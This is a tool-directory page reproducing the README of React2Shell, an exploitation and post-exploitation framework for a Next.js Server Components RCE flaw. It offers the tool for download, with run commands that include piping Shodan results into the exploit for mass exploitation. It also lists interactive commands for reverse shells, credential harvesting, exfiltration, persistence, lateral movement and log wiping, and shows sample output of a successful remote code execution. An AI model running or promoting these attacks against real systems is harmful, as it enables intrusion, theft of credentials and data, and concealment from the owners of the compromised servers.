Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
React2Shell — R2S is a comprehensive exploitation and post-exploitation framework targeting the Next.js React Server Components vulnerability (CVE-2025-55182). It provides an interactive shell with advanced features for penetration testing, including file transfer, persistence, enumeration, privilege escalation checks, and more. | Kitploit
Tools/GitHubGitHub/4nuxd/react2shell
Penetration Testing FrameworksPrivilege EscalationExploit FrameworksPersistence MechanismsLateral MovementWeb Application ExploitationData ExfiltrationPost-ExploitationCommand and ControlContainer Escape
569 months agoNot yet reviewed
GitHub
4nuxd/react2shell

React2Shell

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →

About

R2S is a comprehensive exploitation and post-exploitation framework targeting the Next.js React Server Components vulnerability (CVE-2025-55182). It provides an interactive shell with advanced features for penetration testing, including file transfer, persistence, enumeration, privilege escalation checks, and more.

Share

🚀 R2S - Next.js RSC Exploit Framework

Version Python License CVE

Advanced Post-Exploitation Framework for Next.js React Server Components RCE

Features • Installation • Usage • Commands • Examples


📋 Overview

R2S is a comprehensive exploitation and post-exploitation framework targeting the Next.js React Server Components vulnerability (CVE-2025-55182). It provides an interactive shell with advanced features for penetration testing, including file transfer, persistence, enumeration, privilege escalation checks, and more.

🎯 Key Capabilities

  • ✅ Automated vulnerability scanning - Mass scan multiple targets
  • ✅ Interactive RCE shell - Stateful command execution with directory navigation
  • ✅ HTTP-based file transfer - Upload/download files without base64 limitations
  • ✅ Reverse shell automation - Try 25+ different reverse shell payloads
  • ✅ Advanced enumeration - System, network, container, and cloud metadata
  • ✅ Privilege escalation - Automated privesc vector detection
  • ✅ Credential harvesting - Extract passwords, keys, tokens, and secrets
  • ✅ Persistence mechanisms - Maintain access across reboots
  • ✅ Lateral movement - Discover and pivot to other hosts
  • ✅ Container escape - Check for Docker/Kubernetes breakout vectors
  • ✅ Data exfiltration - Extract sensitive files and configurations
  • ✅ Stealth operations - Clear logs and hide tracks

🔥 Features

🌐 Core Exploitation

  • Mass scanning with multi-threading support
  • Pipeline mode for integration with other tools
  • Automatic vulnerability detection for Next.js RSC
  • Stateful interactive shell with persistent working directory

📁 File Operations

  • HTTP-based upload - Transfer files to target via wget/curl
  • HTTP-based download - Exfiltrate files via POST requests
  • No size limitations - Works with large files (unlike base64 methods)
  • Automatic HTTP server - Starts/stops as needed

🔍 Reconnaissance & Enumeration

  • System enumeration - OS, kernel, users, processes
  • Network discovery - Interfaces, routes, ARP, DNS, listening ports
  • Container detection - Docker, Kubernetes, LXC identification
  • Cloud metadata - AWS, GCP, Azure credential extraction
  • Process memory dumping - Extract secrets from running processes
  • Interesting file discovery - SUID, writable dirs, backups, configs

🔐 Credential Harvesting

  • Environment variables (passwords, API keys, tokens)
  • .env files and configuration files
  • SSH private keys and authorized_keys
  • Bash history with sensitive commands
  • Database files (SQLite, MySQL dumps)
  • Cloud credentials (AWS, Azure, GCP)
  • Git credentials and NPM tokens
  • Browser data (cookies, login data)
  • Docker and Kubernetes secrets

⬆️ Privilege Escalation

  • SUID/SGID binaries detection
  • Sudo permissions enumeration
  • Writable system files (/etc/passwd, /etc/shadow)
  • Docker socket access checks
  • Linux capabilities analysis
  • Kernel exploit suggestions
  • Cron job enumeration
  • PATH hijacking opportunities

🔄 Post-Exploitation

  • Persistence mechanisms - Cron jobs, .bashrc, systemd services
  • Advanced persistence - LD_PRELOAD, systemd timers
  • Port scanning - Internal network reconnaissance
  • Lateral movement - SSH key discovery, known_hosts analysis
  • Container escape - Privileged container checks, capability analysis
  • Data exfiltration - Automated sensitive data collection
  • Reverse shell automation - 25+ payload types with auto-retry

🥷 Stealth & Evasion

  • Log clearing - Bash history, auth logs, syslog
  • Track covering - wtmp, lastlog cleanup
  • Session management - Save and resume sessions

🛠️ Installation

Prerequisites

# Python 3.6 or higher
python3 --version

# Install dependencies
pip3 install requests urllib3

Quick Start

# Clone or download the tool
cd r2s-main

# Make executable (optional)
chmod +x r2s_enhanced.py

# Run the tool
python3 r2s_enhanced.py -h

🚀 Usage

Basic Syntax

python3 r2s_enhanced.py [OPTIONS]

Command-Line Options

OptionDescriptionDefault
-u, --urlSingle target URL-
-l, --listFile containing list of URLs-
-c, --cmdInitial command to executeid
-t, --threadsNumber of scanning threads30
-p, --proxyHTTP proxy (e.g., http://127.0.0.1:8080)-
-v, --verboseEnable verbose outputFalse
--http-portHTTP server port for file transfer8000

Input Methods

1. Single Target

python3 r2s_enhanced.py -u http://target.com

2. Multiple Targets (File)

python3 r2s_enhanced.py -l targets.txt -t 50

3. Pipeline Mode (stdin)

cat targets.txt | python3 r2s_enhanced.py
shodan search "Next.js" | python3 r2s_enhanced.py
subfinder -d example.com | httpx | python3 r2s_enhanced.py

💻 Interactive Shell Commands

Once you gain RCE access, you'll enter an interactive shell with these commands:

📂 File Transfer

upload <local_file> <remote_path>    # Upload file to target
download <remote_file> <local_path>  # Download file from target

🧭 Navigation

cd <directory>                       # Change working directory
pwd                                  # Print working directory

🔍 Enumeration

enum                                 # Complete system enumeration
privesc                              # Privilege escalation checks
harvest                              # Credential harvesting
portscan <ip>                        # Scan internal network ports
memdump [pid]                        # Dump process memory for secrets

🎯 Post-Exploitation

lateral                              # Lateral movement opportunities
escape                               # Container escape vectors
exfil [type]                         # Exfiltrate data (env/config/keys/db/logs/all)
reverse <lhost> <lport>              # Try multiple reverse shell payloads

🔒 Persistence

persist                              # Add basic persistence
advpersist                           # Add advanced persistence

🥷 Stealth

stealth                              # Clear logs and hide tracks

💾 Session Management

save                                 # Save current session
help, ?                              # Show help message
exit, quit                           # Exit interactive shell

🖥️ System Commands

Execute any shell command directly:

whoami
id
uname -a
ps aux
netstat -tulpn
cat /etc/passwd

📚 Examples

Example 1: Basic Exploitation

$ python3 r2s_enhanced.py -u http://vulnerable-app.com

    _   __          __  ____            
   / | / /__  _  __/ /_/ __ \________   
  /  |/ / _ \| |/_/ __/ /_/ / ___/ _ \  
 / /|  /  __/>  </_ _/ _, _/ /__/  __/  
/_/ |_/\___/_/|_|\__/_/ |_|\___/\___/   

   Next.js RSC Exploit Tool (CVE-2025-55182)
   Mass Scanner & Pipeline Edition (v4.1.0 - Enhanced)

   >> CREDIT( G4rxd )

[*] Loaded 1 targets. Starting scan with 30 threads...
[*] Payload Command: id

[VULN] http://vulnerable-app.com >>> RCE SUCCESS
       Output: uid=1000(node) gid=1000(node) groups=1000(node)

[+] Stateful Interactive RCE shell started. Type 'help' for commands.
[*] Advanced features: enum, privesc, persist, portscan, harvest, stealth
[*] New features: memdump, lateral, escape, exfil, advpersist, reverse
Download Tool